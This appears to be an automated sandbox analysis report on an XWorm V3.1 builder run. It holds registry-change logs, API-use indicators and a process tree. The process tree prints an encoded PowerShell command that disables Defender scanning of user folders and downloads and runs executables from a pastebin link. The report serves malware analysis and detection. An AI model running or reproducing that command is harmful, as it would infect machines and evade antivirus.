\REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\4\0\0 = 5000310000000000f0560aae10004c6f63616c003c0009000400efbee3567c65f0560aae2e00000098e10100000001000000000000000000000000000000c27b97004c006f00630061006c00000014000000 explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10 explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByKey:PID = "2" explorer.exe Key created \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Key created \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616193" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\GroupByKey:PID = "0" explorer.exe Key created \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\SniffedFolderType = "Downloads" explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\2 = 720032004bbe5500f056a3ae200058574f524d2d7e322e5a49500000560009000400efbef056a2aef056a3ae2e0000000333020000001400000000000000000000000000000000fd0501580057006f0072006d002d0033002e0031002d006d00610069006e002e007a006900700000001c000000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\2 explorer.exe Key created \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell builder.exe Set value (data) \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202 explorer.exe Key created \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage rundll32.exe Set value (data) \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0400000000000000020000000300000001000000ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\4\0\0\0 explorer.exe Key created \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} builder.exe Set value (int) \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23" SearchApp.exe Set value (data) \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202020202 explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\4\0\0\0\0 = 7e00310000000000f056edae100054454d50315f7e312e5a49500000620009000400efbef056edaef056edae2e00000078db010000000800000000000000000000000000000089849600540065006d00700031005f00580057006f0072006d002d0033002e0031002d006d00610069006e002e007a006900700000001c000000 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202020202020202 explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\LogicalViewMode = "1" explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ explorer.exe Key created \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\SniffedFolderType = "Generic" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 010000000200000000000000ffffffff explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\LogicalViewMode = "2" explorer.exe Key created \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1 explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" builder.exe Key created \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Mode = "6" explorer.exe Key created \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell explorer.exe Key created \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9 explorer.exe Key created \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\4\0\0 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0000000001000000ffffffff builder.exe Set value (data) \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202 explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" SearchApp.exe -
Suspicious behavior: AddClipboardFormatListener 5 IoCs
pid Process 2920 explorer.exe 4136 explorer.exe 4136 explorer.exe 4136 explorer.exe 4136 explorer.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3172 chrome.exe 3172 chrome.exe 2176 chrome.exe 2176 chrome.exe 2576 wsappx.exe 2576 wsappx.exe 2576 wsappx.exe 2576 wsappx.exe 2576 wsappx.exe 2124 taskmgr.exe 2124 taskmgr.exe 2124 taskmgr.exe 2124 taskmgr.exe 2576 wsappx.exe 2124 taskmgr.exe 2124 taskmgr.exe 2124 taskmgr.exe 2124 taskmgr.exe 2124 taskmgr.exe 2124 taskmgr.exe 2124 taskmgr.exe 2124 taskmgr.exe 2124 taskmgr.exe 2124 taskmgr.exe 4928 builder.exe 4928 builder.exe 4928 builder.exe 4928 builder.exe 4928 builder.exe 4928 builder.exe 2124 taskmgr.exe 2124 taskmgr.exe 2124 taskmgr.exe 2124 taskmgr.exe 2124 taskmgr.exe 4928 builder.exe 4928 builder.exe 4928 builder.exe 4928 builder.exe 2124 taskmgr.exe 4928 builder.exe 4928 builder.exe 4928 builder.exe 4928 builder.exe 4928 builder.exe 4928 builder.exe 4928 builder.exe 4928 builder.exe 4928 builder.exe 4928 builder.exe 4928 builder.exe 4928 builder.exe 4928 builder.exe 4928 builder.exe 4928 builder.exe 4928 builder.exe 4928 builder.exe 4928 builder.exe 2124 taskmgr.exe 2124 taskmgr.exe 2124 taskmgr.exe 2124 taskmgr.exe 2124 taskmgr.exe 2124 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 5 IoCs
pid Process 4928 builder.exe 1512 XHVNC.exe 4136 explorer.exe 3676 taskmgr.exe 1172 XWorm V3.1.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs
pid Process 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 3172 chrome.exe Token: SeCreatePagefilePrivilege 3172 chrome.exe Token: SeShutdownPrivilege 3172 chrome.exe Token: SeCreatePagefilePrivilege 3172 chrome.exe Token: SeShutdownPrivilege 3172 chrome.exe Token: SeCreatePagefilePrivilege 3172 chrome.exe Token: SeShutdownPrivilege 3172 chrome.exe Token: SeCreatePagefilePrivilege 3172 chrome.exe Token: SeShutdownPrivilege 3172 chrome.exe Token: SeCreatePagefilePrivilege 3172 chrome.exe Token: SeShutdownPrivilege 3172 chrome.exe Token: SeCreatePagefilePrivilege 3172 chrome.exe Token: SeShutdownPrivilege 3172 chrome.exe Token: SeCreatePagefilePrivilege 3172 chrome.exe Token: SeShutdownPrivilege 3172 chrome.exe Token: SeCreatePagefilePrivilege 3172 chrome.exe Token: SeShutdownPrivilege 3172 chrome.exe Token: SeCreatePagefilePrivilege 3172 chrome.exe Token: SeShutdownPrivilege 3172 chrome.exe Token: SeCreatePagefilePrivilege 3172 chrome.exe Token: SeShutdownPrivilege 3172 chrome.exe Token: SeCreatePagefilePrivilege 3172 chrome.exe Token: SeShutdownPrivilege 3172 chrome.exe Token: SeCreatePagefilePrivilege 3172 chrome.exe Token: SeShutdownPrivilege 3172 chrome.exe Token: SeCreatePagefilePrivilege 3172 chrome.exe Token: SeShutdownPrivilege 3172 chrome.exe Token: SeCreatePagefilePrivilege 3172 chrome.exe Token: SeShutdownPrivilege 3172 chrome.exe Token: SeCreatePagefilePrivilege 3172 chrome.exe Token: SeShutdownPrivilege 3172 chrome.exe Token: SeCreatePagefilePrivilege 3172 chrome.exe Token: SeShutdownPrivilege 3172 chrome.exe Token: SeCreatePagefilePrivilege 3172 chrome.exe Token: SeShutdownPrivilege 3172 chrome.exe Token: SeCreatePagefilePrivilege 3172 chrome.exe Token: SeShutdownPrivilege 3172 chrome.exe Token: SeCreatePagefilePrivilege 3172 chrome.exe Token: SeShutdownPrivilege 3172 chrome.exe Token: SeCreatePagefilePrivilege 3172 chrome.exe Token: SeShutdownPrivilege 3172 chrome.exe Token: SeCreatePagefilePrivilege 3172 chrome.exe Token: SeShutdownPrivilege 3172 chrome.exe Token: SeCreatePagefilePrivilege 3172 chrome.exe Token: SeShutdownPrivilege 3172 chrome.exe Token: SeCreatePagefilePrivilege 3172 chrome.exe Token: SeShutdownPrivilege 3172 chrome.exe Token: SeCreatePagefilePrivilege 3172 chrome.exe Token: SeShutdownPrivilege 3172 chrome.exe Token: SeCreatePagefilePrivilege 3172 chrome.exe Token: SeShutdownPrivilege 3172 chrome.exe Token: SeCreatePagefilePrivilege 3172 chrome.exe Token: SeShutdownPrivilege 3172 chrome.exe Token: SeCreatePagefilePrivilege 3172 chrome.exe Token: SeShutdownPrivilege 3172 chrome.exe Token: SeCreatePagefilePrivilege 3172 chrome.exe Token: SeShutdownPrivilege 3172 chrome.exe Token: SeCreatePagefilePrivilege 3172 chrome.exe Token: SeShutdownPrivilege 3172 chrome.exe Token: SeCreatePagefilePrivilege 3172 chrome.exe Token: SeShutdownPrivilege 3172 chrome.exe Token: SeCreatePagefilePrivilege 3172 chrome.exe Token: SeShutdownPrivilege 3172 chrome.exe Token: SeCreatePagefilePrivilege 3172 chrome.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 3172 chrome.exe 2124 taskmgr.exe 2124 taskmgr.exe 2124 taskmgr.exe 2124 taskmgr.exe 2124 taskmgr.exe 2124 taskmgr.exe 2124 taskmgr.exe 2124 taskmgr.exe 2124 taskmgr.exe 2124 taskmgr.exe 2124 taskmgr.exe 2124 taskmgr.exe 2124 taskmgr.exe 2124 taskmgr.exe 2124 taskmgr.exe 2124 taskmgr.exe 2124 taskmgr.exe 2124 taskmgr.exe 2124 taskmgr.exe 2124 taskmgr.exe 2124 taskmgr.exe 2124 taskmgr.exe 2124 taskmgr.exe 2124 taskmgr.exe 4928 builder.exe 2124 taskmgr.exe 2124 taskmgr.exe 2124 taskmgr.exe 2124 taskmgr.exe 2124 taskmgr.exe 2124 taskmgr.exe 2124 taskmgr.exe -
Suspicious use of SetWindowsHookEx 26 IoCs
pid Process 2576 wsappx.exe 1512 XHVNC.exe 1512 XHVNC.exe 4928 builder.exe 2920 explorer.exe 2920 explorer.exe 2796 StartMenuExperienceHost.exe 3640 StartMenuExperienceHost.exe 3848 rundll32.exe 2100 SearchApp.exe 4136 explorer.exe 3596 SearchApp.exe 772 SearchApp.exe 3568 SearchApp.exe 2868 SearchApp.exe 4136 explorer.exe 4136 explorer.exe 4136 explorer.exe 4136 explorer.exe 4136 explorer.exe 4136 explorer.exe 4136 explorer.exe 4136 explorer.exe 4868 AtlsWare.exe 4136 explorer.exe 4136 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3172 wrote to memory of 3000 3172 chrome.exe 84 PID 3172 wrote to memory of 3000 3172 chrome.exe 84 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 2544 3172 chrome.exe 87 PID 3172 wrote to memory of 4540 3172 chrome.exe 88 PID 3172 wrote to memory of 4540 3172 chrome.exe 88 PID 3172 wrote to memory of 2772 3172 chrome.exe 89 PID 3172 wrote to memory of 2772 3172 chrome.exe 89 PID 3172 wrote to memory of 2772 3172 chrome.exe 89 PID 3172 wrote to memory of 2772 3172 chrome.exe 89 PID 3172 wrote to memory of 2772 3172 chrome.exe 89 PID 3172 wrote to memory of 2772 3172 chrome.exe 89 PID 3172 wrote to memory of 2772 3172 chrome.exe 89 PID 3172 wrote to memory of 2772 3172 chrome.exe 89 PID 3172 wrote to memory of 2772 3172 chrome.exe 89 PID 3172 wrote to memory of 2772 3172 chrome.exe 89 PID 3172 wrote to memory of 2772 3172 chrome.exe 89 PID 3172 wrote to memory of 2772 3172 chrome.exe 89 PID 3172 wrote to memory of 2772 3172 chrome.exe 89 PID 3172 wrote to memory of 2772 3172 chrome.exe 89 PID 3172 wrote to memory of 2772 3172 chrome.exe 89 PID 3172 wrote to memory of 2772 3172 chrome.exe 89 PID 3172 wrote to memory of 2772 3172 chrome.exe 89 PID 3172 wrote to memory of 2772 3172 chrome.exe 89 PID 3172 wrote to memory of 2772 3172 chrome.exe 89 PID 3172 wrote to memory of 2772 3172 chrome.exe 89 PID 3172 wrote to memory of 2772 3172 chrome.exe 89 PID 3172 wrote to memory of 2772 3172 chrome.exe 89 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:688
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 688 -s 34962⤵
- Program crash
PID:4872
-
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:632
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:384
-
-
C:\Windows\explorer.exeexplorer.exe2⤵
- Modifies Installed Components in the registry
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:4136 -
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /43⤵
- Checks processor information in registry
- Suspicious behavior: GetForegroundWindowSpam
PID:3676
-
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\New folder\" -an -ai#7zMap19790:98:7zEvent200483⤵PID:3464
-
-
C:\Users\Admin\Desktop\New folder\XWorm V3.1.exe"C:\Users\Admin\Desktop\New folder\XWorm V3.1.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
PID:1172
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /43⤵PID:5060
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /43⤵
- Checks SCSI registry key(s)
PID:3048 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3048 -s 24084⤵
- Program crash
PID:2584
-
-
-
C:\Users\Admin\Desktop\AtlsWare.exe"C:\Users\Admin\Desktop\AtlsWare.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4868 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAaQBuACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbgBoAGsAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcAB4AGkAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYQBxAGwAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcABhAHMAdABlAGIAaQBuAC4AYwBvAG0ALwByAGEAdwAvAHoAYQBDAGcAcgBSADAAMgAnACkALgBTAHAAbABpAHQAKABbAHMAdAByAGkAbgBnAFsAXQBdACIAYAByAGAAbgAiACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AE4AbwBuAGUAKQA7ACAAJABmAG4AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAUgBhAG4AZABvAG0ARgBpAGwAZQBOAGEAbQBlACgAKQA7ACAAZgBvAHIAIAAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAJABsAG4AawAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwArACkAIAB7ACAAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAbABuAGsAWwAkAGkAXQAsACAAPAAjAHEAZgBjACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAeQB6AHIAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaQB5AGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACgAJABmAG4AIAArACAAJABpAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAnAC4AZQB4AGUAJwApACkAKQAgAH0APAAjAHEAZQBxACMAPgA7ACAAZgBvAHIAIAAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAJABsAG4AawAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwArACkAIAB7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHQAaABpACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB0AGcAYgAjAD4AIA